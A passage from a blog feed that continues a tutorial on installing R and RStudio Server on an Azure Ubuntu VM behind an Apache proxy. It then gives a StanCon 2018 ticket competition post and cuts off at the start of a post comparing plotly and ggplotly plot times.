&lt;p&gt;Unfortunately, things don’t start well - Microsoft have made an endurance test of getting started with Azure. The first stop is the &lt;a href="https://azure.microsoft.com/en-gb/" rel="external"&gt;Azure&lt;/a&gt; web-page. On this page&lt;/p&gt;
&lt;img class="image-center" src="azure_home.png" style="width:500px; class:image-center"&gt;
&lt;p&gt;click on &lt;strong&gt;Free Account&lt;/strong&gt; and follow the instructions. This is a bit of painful process that will require&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Email confirmation&lt;/li&gt;
&lt;li&gt;Text confirmation&lt;/li&gt;
&lt;li&gt;Credit Card confirmation&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Eventually you should get to the dashboard page!&lt;/p&gt;
&lt;img class="image-center" src="azure_dashboard.png" style="width:500px; class:image-center"&gt;
&lt;p&gt;Clicking on &lt;code&gt;Create Resources&lt;/code&gt; will take you to the marketplace&lt;/p&gt;
&lt;img class="image-center" src="azure_marketplace.png" style="width:500px; class:image-center"&gt;
&lt;p&gt;Selecting &lt;code&gt;Ubuntu Server&lt;/code&gt; will launch a dialogue box with four steps:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Step 1: Basics: configuration settings
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Name&lt;/strong&gt;: A name for the virtual machine, e.g. &lt;code&gt;rstudio&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;User name&lt;/strong&gt;: The master user who will have &lt;code&gt;sudo&lt;/code&gt; access, e.g. &lt;code&gt;userX&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Authentication type&lt;/strong&gt;: Either choose ssh or enter a password&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Resource group&lt;/strong&gt;: Since this your first instance, create a new one, say &lt;code&gt;rstudio-group&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Location&lt;/strong&gt;: where will your machine be located&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Step 2: Virtual machine size
&lt;ul&gt;
&lt;li&gt;Select the machine you want. Choose the smallest for the purposes of this exercise&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Step 3: Settings
&lt;ul&gt;
&lt;li&gt;Nothing to change here&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Step 4: Summary
&lt;ul&gt;
&lt;li&gt;Click create and we’re good to go!&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;After around a minute or so, your virtual machine will be ready.&lt;/p&gt;
&lt;h2 id="setting-up-r"&gt;Setting up R&lt;/h2&gt;
&lt;p&gt;The next step is to &lt;code&gt;ssh&lt;/code&gt; into your instance. On the dashboard screen, click on the new box that shows your virtual machine. Select &lt;code&gt;Networking&lt;/code&gt;. Near the top of the screen will be a Public IP address, of the form: XXX.XXX.XXX.XXX. In my instance, the IP address is 52.233.194.195&lt;/p&gt;
&lt;img class="image-center" src="azure_networking.png" style="width:500px; class:image-center"&gt;
&lt;p&gt;Make a note of your address. Next &lt;code&gt;ssh&lt;/code&gt; into your instance via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ssh userX@XXX.XXX.XXX.XXX
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To ensure that ubuntu is up-to-date on our virtual machine, we invoke super sudo powers. First we update the list of ubuntu packages&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt-get update
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then we upgrade as necessary&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt-get upgrade
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we get on with the business of installing R. To use the latest version we need to add a new &lt;a href="https://cran.r-project.org/bin/linux/ubuntu/README.html" rel="external"&gt;repository&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo add-apt-repository ppa:marutter/rrutter
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then update again and install base R&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt update
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt-get install r-base
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Depending on what R packages you want to install it’s worth installing a couple of other things at this point&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt-get install libxml2 libxml2-dev &lt;span style="color:#8b949e;font-style:italic"&gt;# igraph&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt-get install libcairo2-dev &lt;span style="color:#8b949e;font-style:italic"&gt;# Graphics packages&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt-get install libssl-dev libcurl4-openssl-dev &lt;span style="color:#8b949e;font-style:italic"&gt;#httr&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With an eye to the future it’s also worth installing &lt;code&gt;apache2&lt;/code&gt; to help with redirects&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt-get install apache2
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="opening-ports-ready-for-rstudio"&gt;Opening ports ready for RStudio&lt;/h2&gt;
&lt;p&gt;Whenever you access a web-page, the browser specifies a &lt;em&gt;port&lt;/em&gt;. For standard http pages, we use port 80, for secure https pages, we use port 443. For example, when we type&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;https://www.jumpingrivers.com
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;in the browser, this is converted to&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;https://www.jumpingrivers.com:443
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;By default our azure instance only has port 22 open (the port used for ssh communication). To access RStudio, we’ll need to open the following ports&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;80 (for http)&lt;/li&gt;
&lt;li&gt;443 (for https); only required if we implement SSL&lt;/li&gt;
&lt;li&gt;8787 - the default RStudio port. In the last section, we’ll remove this, but just now it’s handy to have it open for testing.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Under &lt;code&gt;Networking&lt;/code&gt;, click &lt;code&gt;Add inbound port rule&lt;/code&gt; and add the three ports (80, 443, 8787):&lt;/p&gt;
&lt;img class="image-center" src="azure_dashboard_port.png" style="width:500px; class:image-center"&gt;
&lt;p&gt;If everything is working, you should be able to enter &lt;code&gt;XXX.XXX.XXX.XXX&lt;/code&gt; in your browser and you’ll see the &lt;code&gt;Apache2 Ubuntu Default Page&lt;/code&gt; with the title. &lt;strong&gt;It works!&lt;/strong&gt;&lt;/p&gt;
&lt;h2 id="installing-rstudio"&gt;Installing RStudio&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.rstudio.com/products/rstudio/download-server/" rel="external"&gt;Installing RStudio&lt;/a&gt; server is now relatively easy:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Check the above link for updates to the version&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt-get install gdebi-core
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;wget https://download2.rstudio.org/rstudio-server-1.1.383-amd64.deb
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo gdebi rstudio-server-1.1.383-amd64.deb
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If everything works correctly, you should be able to view rstudio server via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;XXX.XXX.XXX.XXX:8787
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If the page &lt;em&gt;hangs&lt;/em&gt;, double check you have opened port 8787 under the network settings.&lt;/p&gt;
&lt;h2 id="nicer-urls"&gt;Nicer URLs&lt;/h2&gt;
&lt;p&gt;The first step is to access the page via a standard URL and not an IP address. In the main dashboard screen, under all resources, click on&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rstudio-ip Public IP address
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then select configuration. In the text box under DNS Label, enter text, e.g. &lt;code&gt;rstudio-myname&lt;/code&gt;. So in my case, I have used &lt;code&gt;rstudio-jumpingrivers&lt;/code&gt;&lt;/p&gt;
&lt;img class="image-center" src="azure_dashboard_ip.png" style="width:500px; class:image-center"&gt;
&lt;p&gt;This means we can now access RStudio via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rstudio-jumpingrivers.westeurope.cloudapp.azure.com:8787
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Getting users to type the port number isn’t ideal. What we would like is for users to type&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rstudio-jumpingrivers.westeurope.cloudapp.azure.com/rstudio
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This involves configuring Apache. First navigate to &lt;code&gt;/etc/apache2/sites-available&lt;/code&gt;, e.g.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd /etc/apache2/sites-available
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Next create a file called &lt;code&gt;rstudio.conf&lt;/code&gt;. Using your favourite text editor, e.g. vim or nano. Note that this file is very much space sensitive, so check it carefully.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;VirtualHost *:80&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ServerAdmin hello@jumpingrivers.com
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ServerName rstudio-jumpingrivers.westeurope.cloudapp.azure.com
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ServerAlias www.rstudio-jumpingrivers.westeurope.cloudapp.azure.com
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;Proxy *&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Allow from localhost
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/Proxy&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Specify path for Logs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ErrorLog &lt;span style="color:#a5d6ff"&gt;${&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;APACHE_LOG_DIR&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;/error.log
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; CustomLog &lt;span style="color:#a5d6ff"&gt;${&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;APACHE_LOG_DIR&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;/access.log combined
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; RewriteEngine on
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Following lines should open rstudio directly from the url&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Map rstudio to rstudio/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; RedirectMatch ^/rstudio$ /rstudio/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; RewriteCond %&lt;span style="color:#ff7b72;font-weight:bold"&gt;{&lt;/span&gt;HTTP:Upgrade&lt;span style="color:#ff7b72;font-weight:bold"&gt;}&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;websocket
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; RewriteRule /rstudio/&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;.*&lt;span style="color:#ff7b72;font-weight:bold"&gt;)&lt;/span&gt; ws://localhost:8787/&lt;span style="color:#79c0ff"&gt;$1&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;P,L&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; RewriteCond %&lt;span style="color:#ff7b72;font-weight:bold"&gt;{&lt;/span&gt;HTTP:Upgrade&lt;span style="color:#ff7b72;font-weight:bold"&gt;}&lt;/span&gt; !&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;websocket
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; RewriteRule /rstudio/&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;.*&lt;span style="color:#ff7b72;font-weight:bold"&gt;)&lt;/span&gt; http://localhost:8787/&lt;span style="color:#79c0ff"&gt;$1&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;P,L&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ProxyPass /rstudio/ http://localhost:8787/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ProxyPassReverse /rstudio/ http://localhost:8787/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ProxyRequests off
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/VirtualHost&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then enable the necessary Apache modules&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo a2enmod proxy
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo a2enmod proxy_http
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo a2enmod proxy_html
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo a2enmod proxy_wstunnel
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo a2enmod rewrite
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally, restart Apache&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo a2ensite rstudio.conf
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo service apache2 restart
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You should now be able to access RStudio via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rstudio-jumpingrivers.westeurope.cloudapp.azure.com/rstudio/
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="adding-ssl"&gt;Adding SSL&lt;/h2&gt;
&lt;p&gt;In theory it should be straightforward to add SSL support using &lt;a href="https://letsencrypt.org/" rel="external"&gt;Let’s Encrypt&lt;/a&gt;. However, I’ve found that you hit rate limiters since the domain is azure.com. However, if we register our own domain, we can easily add SSL support. This will be the subject of our next blog post.&lt;/p&gt;
&lt;h4 id="references"&gt;References&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://mgw.dumatics.com/rstudio-server-setup-with-ssl-behind-apache-proxy-server/" rel="external"&gt;https://mgw.dumatics.com/rstudio-server-setup-with-ssl-behind-apache-proxy-server/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Competition: StanCon 2018 ticket</title><link>https://www.jumpingrivers.com/blog/competition-stancon-2018-ticket/</link><pubDate>Wed, 29 Nov 2017 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/competition-stancon-2018-ticket/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/competition-stancon-2018-ticket/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/competition-stancon-2018-ticket/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/competition-stancon-2018-ticket/#the-prize"&gt;The prize&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/competition-stancon-2018-ticket/#how-do-i-enter"&gt;How do I enter?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/competition-stancon-2018-ticket/#faq"&gt;FAQ&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Today we are happy to announce our Stan contest. Something we feel very strongly at Jumping Rivers is giving back to the community. We have benefited immensely from hard work by numerous people, so when possible, we try to give something back.
This year we’re sponsoring StanCon 2018. If you don’t know,&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Stan is freedom-respecting, open-source software for facilitating statistical inference at the frontiers of applied statistics.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Or to put it another way, it makes Bayesian inference fast and (a bit) easier. &lt;a href="http://mc-stan.org/events/stancon2018/" rel="external"&gt;StanCon&lt;/a&gt; is the premier conference for all things &lt;a href="http://mc-stan.org/" rel="external"&gt;Stan&lt;/a&gt; related and this year it will take place at the &lt;a href="http://www.visitasilomar.com/" rel="external"&gt;Asilomar Conference Grounds&lt;/a&gt;, a National Historic Landmark on the Monterey Peninsula right on the beach.&lt;/p&gt;
&lt;p&gt;Our interaction with Stan is via the excellent R package, {rstan} and the &lt;a href="https://www.jumpingrivers.com/training/course/bayesian-inference-stan-rstan-pystan/" rel="external"&gt;introduction to stan&lt;/a&gt; course we run.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2017-competition-stancon-2018-ticket"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="the-prize"&gt;The prize&lt;/h3&gt;
&lt;p&gt;One of the benefits of sponsoring a conference is free tickets. Unfortunately, we can’t make StanCon this year, so we’ve decided to give away the ticket via a competition.&lt;/p&gt;
&lt;h3 id="how-do-i-enter"&gt;How do I enter?&lt;/h3&gt;
&lt;p&gt;Entering the contest is straightforward. We want a nice image to use in our &lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan-monte-carlo/" rel="external"&gt;introduction to stan&lt;/a&gt; course. This can be a cartoon, some neat looking densities, whatever you think!&lt;/p&gt;
&lt;p&gt;For example, my first attempt at a logo resulted in&lt;/p&gt;
&lt;img class="image-center" src="stan-density.png" style="width:350px; max-width:100%"&gt;
&lt;p&gt;Pretty enough, but lacking something.&lt;/p&gt;
&lt;p&gt;Once you’ve come up with your awesome image, simply email &lt;a href="mailto:hello@jumpingrivers.com" rel="external"&gt;hello@jumpingrivers.com&lt;/a&gt; with a link to the image. If the image was generated in R (or other language), than the associated code would be nice. The deadline is the 6th December.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;By popular demand, we’ve moved the deadline to &lt;strong&gt;11th December&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="faq"&gt;FAQ&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Can I submit more than one image? Feel free.&lt;/li&gt;
&lt;li&gt;Who owns the copyright? Our intention is to make the image &lt;a href="https://creativecommons.org/share-your-work/public-domain/cc0/" rel="external"&gt;CC0&lt;/a&gt;. However, we’re happy to change the copyright to suit. The only proviso is that we can use the image for our {rstan} course.&lt;/li&gt;
&lt;li&gt;Another question. Contact us via the &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;contact page&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/competition-stancon-2018-ticket/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Comparing plotly &amp; ggplotly plot generation times</title><link>https://www.jumpingrivers.com/blog/comparing-plotly-ggplotly-plot-generation-times/</link><pubDate>Mon, 27 Nov 2017 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/comparing-plotly-ggplotly-plot-generation-times/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/comparing-plotly-ggplotly-plot-generation-times/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/comparing-plotly-ggplotly-plot-generation-times/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The {plotly} package. A godsend for interactive documents, dashboard and presentations. For such documents, there is no doubt that anyone would prefer a plot created in {plotly} rather than {ggplot2}. Why? Using {plotly} gives you neat and crucially &lt;em&gt;interactive&lt;/em&gt; options at the top, whereas {ggplot2} objects are static. In an app we have been developing here at &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt;, we found ourselves asking the question would it be quicker to use &lt;code&gt;plot_ly()&lt;/code&gt; or wrapping a {ggplot2} object in &lt;code&gt;ggplotly()&lt;/code&gt;? I found the results staggering.&lt;/p&gt;
&lt;h3 id="prerequisites"&gt;Prerequisites&lt;/h3&gt;
&lt;p&gt;Throughout we will be using the packages: {dplyr}, {tidyr}, {ggplot2}, {plotly} and {microbenchmark}. The data in use is the &lt;code&gt;birthdays&lt;/code&gt; dataset in the {mosaicData} package. This data sets contains the daily birth count in each state of the USA from 1969 - 1988. The packages can be installed in the usual way (remember you can install packages in &lt;a href="https://www.jumpingrivers.com/blog/speeding-up-package-installation/"&gt;parallel&lt;/a&gt;)&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;mosaicData&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyr&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;plotly&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;microbenchmark&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;mosaicData&amp;#34;&lt;/span&gt;)
